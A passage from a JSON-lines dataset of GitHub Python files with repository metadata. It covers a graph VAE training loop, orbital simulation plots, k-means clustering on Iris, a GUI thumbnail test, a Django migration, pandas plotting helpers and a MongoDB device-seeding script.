norm=norm,\n warm_up=warm_up, device=args.device)\n for i in range(int(args.K/2)):\n z = z_vec[:, i]\n D_xz = D(features, z)\n z_perm = permute_dims(z)\n D_x_z = D(features, z_perm)\n output_ = -(D_xz.mean() - (torch.exp(D_x_z - 1).mean()))\n if i == 0:\n output = output_.unsqueeze(0)\n else:\n output = torch.cat((output, output_.unsqueeze(0)), dim=0)\n\n Info_xz = output.mean()\n\n loss = loss1 + args.gamma + Info_xz\n\n optimizer.zero_grad()\n loss.backward(retain_graph=True)\n optimizer_D.zero_grad()\n Info_xz.backward()\n\n optimizer.step()\n optimizer_D.step()\n\n cur_loss = loss.item()\n print('Epoch:', '%04d ---> ' % (epoch + 1), 'training_loss = {:.5f} '.format(cur_loss),\n 'time = {:.5f} '.format(time.time() - t))\n\n writer.add_scalar('Loss/train_loss', cur_loss, epoch)\n\n #print(\"Optimization Finished!\")\n fig = plt.figure()\n ax = fig.add_subplot(111)\n\n for i in range(adj_array.shape[0]):\n for j in range(adj_array.shape[0]):\n if adj_array[i, j] == 1:\n x_vals = [hidden_emb[i, 0], hidden_emb[j, 0]]\n y_vals = [hidden_emb[i, 1], hidden_emb[j, 1]]\n ax.plot(x_vals, y_vals, color='blue', linewidth=0.8)\n\n for i in range(adj_array.shape[0]):\n\n ax.scatter(hidden_emb[i, 0],\n hidden_emb[i, 1],\n cmap='jet', c='black', edgecolors=None, s=20)\n\n\n ax.set_xlim(\n [-1 / np.sqrt(args.c) - 0.2 * (1 / np.sqrt(args.c)), 1 / np.sqrt(args.c) + 0.2 * (1 / np.sqrt(args.c))])\n ax.set_ylim(\n [-1 / np.sqrt(args.c) - 0.2 * (1 / np.sqrt(args.c)), 1 / np.sqrt(args.c) + 0.2 * (1 / np.sqrt(args.c))])\n patch = plt.Circle((0, 0), radius=1 / np.sqrt(args.c), color='black', fill=False)\n ax.add_patch(patch)\n if epoch > 60:\n plt.show()\n fig.savefig('moreeps/reduced_latent_more_{}.pdf'.format(epoch), format='pdf', dpi=500)\n #hidden_emb = torch.from_numpy(hidden_emb)\n #A = torch.zeros(hidden_emb.shape[0], hidden_emb.shape[0])\n #for i in range(hidden_emb.shape[0]):\n # for j in range(hidden_emb.shape[0]):\n # A[i, j] = dist(hidden_emb[i], hidden_emb[j], c=args.c)\n\n #print(A)\n #exit()\n fig = plt.figure()\n ax = fig.add_subplot(111)\n\n for i in range(adj_array.shape[0]):\n for j in range(adj_array.shape[0]):\n if adj_array[i, j] == 1:\n x_vals = [hidden_emb[i, 0], hidden_emb[j, 0]]\n y_vals = [hidden_emb[i, 1], hidden_emb[j, 1]]\n ax.plot(x_vals, y_vals, color='blue', linewidth=0.8)\n\n for i in range(adj_array.shape[0]):\n\n ax.scatter(hidden_emb[i, 0],\n hidden_emb[i, 1],\n cmap='jet', c='black', edgecolors=None, s=20)\n\n\n for i in range(adj_array.shape[0]):\n ax.annotate(str(i), (hidden_emb[i, 0], hidden_emb[i, 1]))\n\n ax.set_xlim(\n [-1 / np.sqrt(args.c) - 0.2 * (1 / np.sqrt(args.c)), 1 / np.sqrt(args.c) + 0.2 * (1 / np.sqrt(args.c))])\n ax.set_ylim(\n [-1 / np.sqrt(args.c) - 0.2 * (1 / np.sqrt(args.c)), 1 / np.sqrt(args.c) + 0.2 * (1 / np.sqrt(args.c))])\n patch = plt.Circle((0, 0), radius=1 / np.sqrt(args.c), color='black', fill=False)\n ax.add_patch(patch)\n fig.savefig('moreeps/reduced_latent_{}.pdf'.format(epoch), format='pdf', dpi=500)\n\n\nif __name__ == '__main__':\n print('New_Experiment', 'c:{}'.format(args.c), 'K:{}'.format(args.K), 'J:{}'.format(args.J),\n 'learning_rate:{}'.format(args.lr),\n 'warm_up:{}'.format(args.warmup_de), 'hidden1:{}'.format(args.hidden1), 'hidden2:{}'.format(args.hidden2),\n 'droput:{}'.format(args.dropout))\n tensorboard_file_name = '___Run_ID___' + '__c' + str(args.c) + '__K' + str(args.K) + '__J' + str(args.K) + \\\n '__lr' + str(args.lr) + '__warm_up' + str(args.warmup_de) + '__hidden1_' + str(\n args.hidden1) + \\\n '__hidden2_' + str(args.hidden2) + '__dropout' + str(args.dropout)\n writer = SummaryWriter(log_dir='./logs', filename_suffix=tensorboard_file_name)\n gae_for(args)\n", "repo_name": "esihge/esihge", "sub_path": "main_synthetic.py", "file_name": "main_synthetic.py", "file_ext": "py", "file_size_in_byte": 11922, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.system", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 34, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 35, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 64, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 81, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 86, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 87, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 87, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 89, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 90, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 92, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 93, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.randperm", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 111, "usage_type": "call"}, {"api_name": "utils.load_data", "line_number": 114, "usage_type": "call"}, {"api_name": "synthetic.SyntheticDataset", "line_number": 120, "usage_type": "call"}, {"api_name": "networkx.adjacency_matrix", "line_number": 121, "usage_type": "call"}, {"api_name": "networkx.from_dict_of_lists", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 123, "usage_type": "call"}, {"api_name": "json.load", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 132, "usage_type": "call"}, {"api_name": "networkx.adjacency_matrix", "line_number": 133, "usage_type": "call"}, {"api_name": "networkx.from_dict_of_lists", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 134, "usage_type": "call"}, {"api_name": "scipy.sparse.dia_matrix", "line_number": 143, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 143, "usage_type": "name"}, {"api_name": "numpy.newaxis", "line_number": 143, "usage_type": "attribute"}, {"api_name": "utils.mask_test_edges", "line_number": 146, "usage_type": "call"}, {"api_name": "utils.preprocess_graph", "line_number": 151, "usage_type": "call"}, {"api_name": "scipy.sparse.eye", "line_number": 154, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 154, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 160, "usage_type": "call"}, {"api_name": "model.GCNModelVAE", "line_number": 167, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 168, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 168, "usage_type": "name"}, {"api_name": "model.parameters", "line_number": 168, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 175, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 175, "usage_type": "name"}, {"api_name": "torch.min", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 180, "usage_type": "call"}, {"api_name": "time.time", "line_number": 182, "usage_type": "call"}, {"api_name": "model.train", "line_number": 183, "usage_type": "call"}, {"api_name": "optimizer.loss_function", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 197, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 201, "usage_type": "call"}, {"api_name": "optimizer.zero_grad", "line_number": 207, "usage_type": "call"}, {"api_name": "optimizer.step", "line_number": 212, "usage_type": "call"}, {"api_name": "time.time", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 222, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 242, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.Circle", "line_number": 243, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 243, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 243, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 246, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 246, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 256, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 256, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.Circle", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.utils.tensorboard.SummaryWriter", "line_number": 294, "usage_type": "call"}]}
+{"seq_id": "340148573", "text": "\"\"\"\nPlots the energy and seperation evolutions of the [sun, earth, jupiter] system.\n\"\"\"\n\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport initial_conditions as ic\n\nyear_in_s = ic.year_in_s\ndt = np.array([50, 25, 10, 1]) * ic.dt\nparticle_sets = [ic.create_particles(dt=i) for i in dt]\n\ndef modulus(vector):\n\t\ttotal = np.sqrt(sum(vector[i]**2 for i in range(3))) \n\t\treturn total\n\nmpl.rcParams[\"font.size\"] = 25\nfig, ax = plt.subplots(figsize=(10,10))\nax.set(xlabel='Time [yrs]', ylabel='Percentage change in Seperation')\nplt.gcf().set_tight_layout(True) # To prevent the xlabel being cut off\n\n\n\nfor index, particles in enumerate(particle_sets):\n time = 0\n sun = particles[0]\n earth = particles[1]\n seperation = [modulus(earth.pos - sun.pos)]\n time_tracker = [0]\n\n for i in range(int(year_in_s / dt[index]) * 10):\n time += dt[index] / year_in_s\n time_tracker.append(time)\n for p in particles:\n p.calc_next_v(particles)\n for p in particles:\n p.set_new_v()\n p.calc_next_pos()\n p.set_new_pos()\n seperation.append(modulus(earth.pos - sun.pos))\n \n ax.plot(time_tracker, ((seperation - seperation[0]) / seperation[0]) * 100, label = f\"{int(dt[index] / ic.dt)} day timestep\", linewidth=4)\n\nax.legend()\nplt.show()\n", "repo_name": "zebsummerfield/Gravitational_Collapse", "sub_path": "seperation_with_different_dt.py", "file_name": "seperation_with_different_dt.py", "file_ext": "py", "file_size_in_byte": 1344, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "initial_conditions.year_in_s", "line_number": 10, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 11, "usage_type": "call"}, {"api_name": "initial_conditions.dt", "line_number": 11, "usage_type": "attribute"}, {"api_name": "initial_conditions.create_particles", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.rcParams", "line_number": 18, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "initial_conditions.dt", "line_number": 43, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}]}
+{"seq_id": "69920130973", "text": "import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.utils import shuffle\r\nimport math\r\nimport seaborn as sns\r\nfrom scipy.spatial import distance\r\nimport matplotlib.pyplot as plt\r\ndef iterd(a):\r\n a=round(math.sqrt(a))\r\n if (a%2)==0:\r\n a=a+1\r\n return(a)\r\n else:\r\n return(a)\r\ndf=pd.read_excel(\"Iris.xls\")\r\ndf=shuffle(df)\r\nklist=[]\r\ndistlist=[]\r\n# =============================================================================\r\n# G1=pd.DataFrame()\r\n# G2=pd.DataFrame()\r\n# G3=pd.DataFrame()\r\n# =============================================================================\r\ndf=df.drop(\"iris\",axis=1)\r\nfor k in range(2,iterd(len(df))):\r\n df[\"grp\"]=0\r\n grp=df.sample(n=k,random_state=56)\r\n grp[\"value\"]=0\r\n i=0\r\n for index,row in grp.iterrows():\r\n row[\"grp\"]=i\r\n grp.loc[index]=row\r\n i=i+1\r\n \r\n for index1,row1 in df.iterrows():\r\n for index,row in grp.iterrows():\r\n row[\"value\"]=distance.euclidean(list(row.drop([\"grp\",\"value\"])),list(row1.drop([\"grp\"])))\r\n grp.loc[index]=row\r\n grp=grp.sort_values(by=\"value\")\r\n row1[\"grp\"]=grp.head(1)[\"grp\"]\r\n df.loc[index1]=row1\r\n for jk in range(20):\r\n \r\n g=df.groupby(\"grp\")\r\n for s,r in g:\r\n grp[\"sepal length\"][grp[\"grp\"]==s]=df[\"sepal length\"][df[\"grp\"]==s].mean()\r\n grp[\"sepal width\"][grp[\"grp\"]==s]=df[\"sepal width\"][df[\"grp\"]==s].mean()\r\n grp[\"petal length\"][grp[\"grp\"]==s]=df[\"petal length\"][df[\"grp\"]==s].mean()\r\n grp[\"petal width\"][grp[\"grp\"]==s]=df[\"petal width\"][df[\"grp\"]==s].mean()\r\n dist=0\r\n for index1,row1 in df.iterrows():\r\n for index,row in grp.iterrows():\r\n row[\"value\"]=distance.euclidean(list(row.drop([\"grp\",\"value\"])),list(row1.drop([\"grp\"])))\r\n grp.loc[index]=row\r\n grp=grp.sort_values(by=\"value\")\r\n row1[\"grp\"]=grp.head(1)[\"grp\"]\r\n dist=dist+float(grp.head(1)[\"value\"]**2)\r\n df.loc[index1]=row1\r\n klist.append(k)\r\n distlist.append(dist)\r\nprint(klist)\r\nprint(distlist)\r\nplt.plot(klist,distlist)\r\nplt.show()\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n ", "repo_name": "arunava5764/Efficient_Clustering_using_Closest_Neighbor_approach", "sub_path": "kmeans_modified_compare.py", "file_name": "kmeans_modified_compare.py", "file_ext": "py", "file_size_in_byte": 2194, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "math.sqrt", "line_number": 9, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 15, "usage_type": "call"}, {"api_name": "sklearn.utils.shuffle", "line_number": 16, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.euclidean", "line_number": 37, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 37, "usage_type": "name"}, {"api_name": "scipy.spatial.distance.euclidean", "line_number": 53, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}]}
+{"seq_id": "12576840209", "text": "#!/usr/bin/env python\n# encoding: utf-8\nimport elementary\nimport evas\n\ndef thumb_clicked(obj):\n if not elementary.need_ethumb():\n print(\"Ethumb not available!\")\n return\n\n images = (\n \"panel_01.jpg\",\n \"plant_01.jpg\",\n \"rock_01.jpg\",\n \"rock_02.jpg\",\n \"sky_01.jpg\",\n \"sky_02.jpg\",\n \"sky_03.jpg\",\n \"sky_04.jpg\",\n \"wood_01.jpg\",\n \"mystrale.jpg\",\n \"mystrale_2.jpg\"\n )\n\n win = elementary.StandardWindow(\"thumb\", \"Thumb\")\n win.autodel_set(True)\n if obj is None:\n win.callback_delete_request_add(lambda o: elementary.exit())\n\n tb = elementary.Table(win)\n tb.size_hint_weight_set(evas.EVAS_HINT_EXPAND, evas.EVAS_HINT_EXPAND)\n\n n = 0\n for j in range(12):\n for i in range(12):\n th = elementary.Thumb(win)\n n = (n + 1) % 11\n th.file = \"images/%s\" % (images[n])\n th.size_hint_weight_set(evas.EVAS_HINT_EXPAND, evas.EVAS_HINT_EXPAND)\n th.size_hint_align_set(evas.EVAS_HINT_FILL, evas.EVAS_HINT_FILL)\n tb.pack(th, i, j, 1, 1)\n th.editable = True\n th.show()\n\n sc = elementary.Scroller(win)\n sc.size_hint_weight_set(evas.EVAS_HINT_EXPAND, evas.EVAS_HINT_EXPAND)\n win.resize_object_add(sc)\n\n sc.content_set(tb)\n tb.show()\n sc.show()\n\n win.resize(600, 600)\n win.show()\n\nif __name__ == \"__main__\":\n elementary.init()\n\n thumb_clicked(None)\n\n elementary.run()\n elementary.shutdown()\n", "repo_name": "kakaroto/e17", "sub_path": "BINDINGS/python/python-elementary/tests/test_thumb.py", "file_name": "test_thumb.py", "file_ext": "py", "file_size_in_byte": 1520, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 22, "dataset": "github-code", "pt": "31", "api": [{"api_name": "elementary.need_ethumb", "line_number": 7, "usage_type": "call"}, {"api_name": "elementary.StandardWindow", "line_number": 25, "usage_type": "call"}, {"api_name": "elementary.exit", "line_number": 28, "usage_type": "call"}, {"api_name": "elementary.Table", "line_number": 30, "usage_type": "call"}, {"api_name": "evas.EVAS_HINT_EXPAND", "line_number": 31, "usage_type": "attribute"}, {"api_name": "elementary.Thumb", "line_number": 36, "usage_type": "call"}, {"api_name": "evas.EVAS_HINT_EXPAND", "line_number": 39, "usage_type": "attribute"}, {"api_name": "evas.EVAS_HINT_FILL", "line_number": 40, "usage_type": "attribute"}, {"api_name": "elementary.Scroller", "line_number": 45, "usage_type": "call"}, {"api_name": "evas.EVAS_HINT_EXPAND", "line_number": 46, "usage_type": "attribute"}, {"api_name": "elementary.init", "line_number": 57, "usage_type": "call"}, {"api_name": "elementary.run", "line_number": 61, "usage_type": "call"}, {"api_name": "elementary.shutdown", "line_number": 62, "usage_type": "call"}]}
+{"seq_id": "25722859449", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('bober_tasks', '0003_task_country'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='tasktranslation',\n name='template',\n field=models.CharField(default='default', max_length=255, choices=[(b'default', b'default.html')]),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='task',\n name='interaction_type',\n field=models.CharField(default=b'non-interactive', max_length=45),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='task',\n name='international_id',\n field=models.CharField(unique=True, max_length=16),\n preserve_default=True,\n ),\n ]\n", "repo_name": "polz113/bober", "sub_path": "django/bober/bober_tasks/migrations/0004_auto_20151109_1733.py", "file_name": "0004_auto_20151109_1733.py", "file_ext": "py", "file_size_in_byte": 939, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}]}
+{"seq_id": "19105817052", "text": "import matplotlib.pyplot as plot\nimport pandas as pandas\n\n\n\"\"\"\ndef pandas_plot_single(pandas_dataframe: pandas.DataFrame, y_axs: list, x_axs: list, title: str = \"\") -> plot:\n\nFunction to create a scatter plot for a single pair of columns.\n\nParameters:\n pandas_dataframe (pandas.DataFrame): input data in the form of a Pandas DataFrame.\n y_axs (list): list of column names to be used as the y-axis data.\n x_axs (list): list of column names to be used as the x-axis data.\n title (str): title of the plot.\n\nReturns: plot\n\"\"\"\n\ndef pandas_plot_single(pandas_dataframe: pandas.DataFrame, y_axs: list, x_axs: list, title: str = \"\") -> plot:\n # Build the scatter plot\n plot.scatter(y_axs, x_axs)\n plot.xlabel(y_axs)\n plot.ylabel(x_axs)\n plot.title(title)\n return plot\n\n\n\"\"\"\ndef pandas_plot_figure(pandas_dataframe: pandas.DataFrame, col_names: list[str], axs_col_name: str, tittle : str = \"\") -> plot:\n\nFunction to create a plot with multiple lines.\n\nParameters:\n pandas_dataframe (pandas.DataFrame): input data in the form of a Pandas DataFrame.\n col_names (list): list of column names to be plotted.\n axs_col_name (str): column name to be used as the x-axis data.\n tittle (str): title of the plot.\n\nReturns: plot\n\"\"\"\n\ndef pandas_plot_figure(pandas_dataframe: pandas.DataFrame, col_names: list[str], axs_col_name: str, tittle : str = \"\") -> plot:\n x_axs = pandas_dataframe[axs_col_name].tolist()\n \n fig, ax = plot.subplots() # Create a matplotlib figure\n for col_name in col_names:\n ax.plot(x_axs, pandas_dataframe[col_name].tolist(), label=col_name)# Set title and labels\n \n ax.set_xlabel(axs_col_name)\n ax.set_ylabel('score')# Add a legend\n ax.legend(loc='lower center', bbox_to_anchor=(1.25, 0.5), ncol=3)\n ax.set_title(tittle)\n return plot\n \n \n\"\"\"\ndef pandas_plot_scatter(pandas_dataframe: pandas.DataFrame, col_names: list[str], axs_col_name: str, tittle : str = \"\") -> plot:\n\nFunction to create a scatter plot for multiple pairs of columns.\n\nParameters:\n pandas_dataframe (pandas.DataFrame): input data in the form of a Pandas DataFrame.\n col_names (list): list of column names to be plotted.\n axs_col_name (str): column name to be used as the x-axis data.\n tittle (str): title of the plot.\n\nReturns: plot\n\"\"\"\n\ndef pandas_plot_scatter(pandas_dataframe: pandas.DataFrame, col_names: list[str], axs_col_name: str, tittle : str = \"\") -> plot:\n plot.subplots(figsize=(8, 6))\n plot.subplots_adjust(left=0.1)\n plot.title(tittle)\n plot.xlabel(axs_col_name)\n plot.ylabel(\"z-score\")\n \n x_axs = pandas_dataframe[axs_col_name].tolist()\n \n for column in col_names:\n plot.scatter(x_axs, pandas_dataframe[column].tolist(), label=column, s=9)\n \n plot.legend(loc='lower right', fontsize=8)\n\n return plot", "repo_name": "mstrielnikov/score-standardization-spark", "sub_path": "src/visualization/visualize_plot.py", "file_name": "visualize_plot.py", "file_ext": "py", "file_size_in_byte": 2826, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.DataFrame", "line_number": 19, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 42, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 70, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots_adjust", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}]}
+{"seq_id": "37806608283", "text": "\nfrom schemas.mongo_models.device_models import MongoDevice, GeoJson2DPoint, MongoDeviceDataEntry\nfrom schemas.mongo_models.account_models import MongoCompanyAccount, MongoCompany\nfrom passlib.context import CryptContext\nfrom beanie import init_beanie\nimport motor\nimport asyncio\nimport time\nimport math\nimport os\nimport sys\nimport random\ncwd = os.getcwd()\nsys.path.append(cwd)\n\n\npwd_context = CryptContext(schemes=[\"bcrypt\"], deprecated=\"auto\")\n\n\nasync def main():\n client = motor.motor_asyncio.AsyncIOMotorClient(\n os.environ['mongo_database_url'])\n await init_beanie(database=client['test'] if os.environ['ENV'] == 'DEV' else client['main'], document_models=[MongoCompany, MongoCompanyAccount, MongoDevice])\n print('making')\n # mongo_company = MongoCompany.construct()\n # mongo_company.name = 'test'\n # await mongo_company.save()\n\n # mongo_account = MongoCompanyAccount.construct()\n # mongo_account.email = 'test'\n # mongo_account.password_hash = pwd_context.hash('test')\n # mongo_account.company_id = mongo_company.id\n # await mongo_account.save()\n\n company = await MongoCompany.find_one(MongoCompany.name == 'test')\n # company.labels = {\n # }\n # await company.save()\n\n device: MongoDevice = MongoDevice.construct()\n device.device_id = 10\n device.device_secret = 20\n device.aes_key = b'\\x12!\\xfbLT\\xf6\\xd1YY}\\xc9\\xd4i\\xdb\\xb9\\x92'\n device.data = []\n device.past_day_data = []\n device.past_week_data = []\n device.past_month_data = []\n device.past_year_data = []\n date = int(time.time()) - 24*60*60\n # for i in range(24*2):\n # entry = MongoDeviceDataEntry.construct()\n # entry.time_s = date + i*30*60\n # entry.distance_mm = 50 * math.sin(i*math.pi*2/24-2)\n # device.past_day_data.append(entry)\n device.company_id = company.id\n device.creation_date = int(time.time())\n device.location = GeoJson2DPoint(coordinates=(51.500 + (random.randint(-500, 500) / 10000),\n -0.1743 + (random.randint(-500, 500) / 10000)))\n device.warning_level = 5\n device.warning_level_percentage = 50\n device.installation_comment = ''\n device.comments = ''\n device.pinned = False\n await device.save()\n print(device)\n\n for i in range(20):\n i = i * 10 + 50\n device: MongoDevice = MongoDevice.construct()\n device.device_id = i\n device.device_secret = 30\n device.aes_key = b'\\x12!\\xfbLT\\xf6\\xd1YY}\\xc9\\xd4i\\xdb\\xb9\\x92'\n device.data = []\n device.past_day_data = []\n device.past_week_data = []\n device.past_month_data = []\n device.past_year_data = []\n date = int(time.time()) - 24*60*60\n for i in range(24*2):\n entry = MongoDeviceDataEntry.construct()\n entry.time_s = date + i*30*60\n entry.distance_mm = 50 * math.sin(i*math.pi*2/24)\n device.past_day_data.append(entry)\n device.company_id = company.id\n device.creation_date = int(time.time())\n device.location = GeoJson2DPoint(\n coordinates=(51.498 + 